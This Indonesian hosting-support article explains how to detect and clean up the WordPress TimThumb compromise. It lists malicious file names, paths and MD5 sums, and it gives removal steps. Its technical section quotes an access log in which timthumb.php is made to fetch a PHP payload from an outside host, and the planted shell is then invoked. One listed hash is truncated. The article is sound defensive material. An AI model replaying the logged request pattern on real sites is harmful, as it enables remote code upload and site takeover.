Gangguan WordPress: TimThumb

TimThumb adalah alat bantu yang digunakan oleh tema dan plugin WordPress untuk mengubah ukuran gambar. Versi lama TimThumb memiliki kerentanan keamanan yang memungkinkan penyerang meng-upload file berbahaya ("jahat") dari situs web lain. File jahat pertama selanjutnya memungkinkan penyerang meng-upload file berbahaya lainnya ke akun hosting.

Anda dapat memperoleh informasi lebih lanjut tentang gangguan dan cara menanganinya di Bagaimana jika situs web saya diretas?.

Sejumlah Tanda Gangguan

Selain sejumlah tanda yang disebutkan di Bagaimana jika situs web saya diretas?, Anda juga dapat mengetahui bahwa situs telah terpengaruh oleh gangguan spesifik ini jika akun Anda berisi file dengan pola berikut di direktori plugin:

  • external_[md5 hash].php — misalnya: external_dc8e1cb5bf0392f054e59734fa15469b.php
  • [md5 hash].php — misalnya: 7eebe45bde5168488ac4010f0d65cea8.php

Anda dapat menemukan contoh kemungkinan md5 hash pada bagian MD5SUMS File Berbahaya yang Diketahui dalam artikel ini.

Anda juga dapat menemukan file berikut di direktori akar situs web (selengkapnya):

  • x.txt
  • logx.txt

Pemulihan

Anda harus menghapus semua file jahat dan yang terganggu. Sebelum menghapus apa pun, sebaiknya buat cadangan situs web (selengkapnya).

Mencari File Jahat

File jahat yang awalnya di-upload melalui kerentanan TimThumb biasanya akan berada di salah satu direktori berikut, yang terdapat di direktori /theme atau /plugin berisi file TimThumb rentan.

  • /tmp
  • /cache
  • /images

Contoh lokasi file jahat:

[webroot]/wp-content/themes/[tema dengan TimThumb rentan]/cache/images/

Contoh nama file jahat di lokasi ini:

  • ef881b33fba49bd6ad1818062d071a9c.php
  • db648d44074f33a8857066b97290d247.php
  • 3cf739debc9340540c923bbf3b73044b.php
  • dc33a2e36d3179a06278191088c2ef35.php
  • 8377cb73d30655dc2cbf906c9310da56.php
  • eb117b212e2906f52c0a0c9132c6c07a.php
  • a4924ec23939d2410354efbb8d4ddd06.php
  • vvv3.php
  • ea90e1e4d7ba30848f70b13d616c6ed4.php
  • 236268f2a06e4153365b998d13934eb9.php
  • 6a4fa516943e2fa09e3704486075de9f.php
  • 896c4eb4ff2581f6e623db1904b80a44.php
  • wp-images.php

File x.txt dan logx.txt akan berisi informasi tentang waktu pembuatan file jahat menggunakan kerentanan TimThumb dan lokasi file jahat tersebut dalam akun hosting. Informasi ini bermanfaat dalam menentukan file yang perlu dihapus dan lokasi untuk menemukannya. Namun, informasi tersebut mungkin tidak akan menghasilkan daftar lengkap file yang perlu dihapus.

Contoh:

Hari: Selasa, 11 April 2013 pukul 06:21:15 -0700
IP: X.X.X.X
Browser: Mozilla/5.0 (Windows; U; Windows NT 5.1; id-ID; rv:1.9.2) Gecko/20100115 Firefox/3.6
Url: /wp-content/themes/[tema dengan TimThumb rentan]/cache/images/2817f389ac8b52527a0c5e4aabb464aa.php?clone

File untuk Dihapus

Setelah membuat cadangan situs, hapus file berikut:

  • x.txt
  • logx.txt
  • external_[md5 hash].php — misalnya: external_dc8e1cb5bf0392f054e59734fa15469b.php
  • [md5 hash].php — misalnya: 7eebe45bde5168488ac4010f0d65cea8.php
  • File PHP berbahaya lainnya yang ditemukan bersama file bernama md5 hash.

Anda dapat melakukannya melalui FTP (selengkapnya) atau melalui manajer file dalam panel kontrol untuk akun hosting (selengkapnya).

Anda juga harus:

  • Memperbarui semua tema dan plugin ke versi terkini.
  • Mengganti setiap TimThumb.php dengan versi terbaru yang terdapat di sini.

Info Teknis

Contoh Log HTTP

x.x.x.x - - [27/Apr/2014:08:04:22 -0700] "GET SampleSite.tld/wp-content/themes/[tema dengan TimThumb rentan]/framework/timthumb.php?src=http%3A%2F%2Fimg.youtube.com.bargainbookfinders.com%2Fsempak.php HTTP/1.1" 200 1018 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
x.x.x.s - - [27/Apr/2014:08:04:23 -0700] "GET SampleSite.tld/wp-content/themes/[tema dengan TimThumb rentan]/cache/images/896c4eb4ff2581f6e623db1904b80a44.php?clone HTTP/1.1" 200 13128 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
x.x.x.x - - [27/Apr/2014:08:04:26 -0700] "GET SampleSite.tld/wp-includes/wp-script.php HTTP/1.1" 404 36841 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
x.x.x.x - - [27/Apr/2014:08:04:28 -0700] "GET SampleSite.tld/wp-content/themes/[tema dengan TimThumb rentan]/cache/images/896c4eb4ff2581f6e623db1904b80a44.php HTTP/1.1" 200 13128 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
x.x.x.x - - [27/Apr/2014:08:04:30 -0700] "GET SampleSite.tld/wp-content/themes/[tema dengan TimThumb rentan]/cache/images/896c4eb4ff2581f6e623db1904b80a44.php HTTP/1.1" 200 13128 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"

MD5SUMS File Berbahaya yang Diketahui

  • 2c4bcdc6bee98ed4dd55e0d35564d870
  • 10069c51da0c87ad904d602beb9e7770
  • 8855aecb5c45a5bfd962b4086c8ff96a
  • 526a4cf1f66f27a959a39019fdf1fae9
  • 161d2e53c664bd0fe1303017a145b413
  • 39f186a0f55b04c651cbff6756a64ccc
  • f67ca8f0bac08f5e8ccab6013b7acf70
  • 747c7afcda0eef0eff6ed6838494c32
  • cfdf59a58057b62f4707b909bcbd4577

File Berbahaya Lainnya

  • wp-script.php
  • wp-images.php
  • vvv3.php
  • data.php

Apakah Artikel Ini Berguna?
Terima kasih atas masukan Anda. Untuk berbicara dengan perwakilan layanan pelanggan, hubungi nomor ponsel dukungan atau gunakan opsi chatting di atas.
Senang bisa membantu! Ada hal lain yang dapat kami lakukan untuk Anda?
Maaf tentang hal tersebut. Sampaikan apa yang membuat Anda bingung atau mengapa solusi tersebut tidak mengatasi masalah Anda.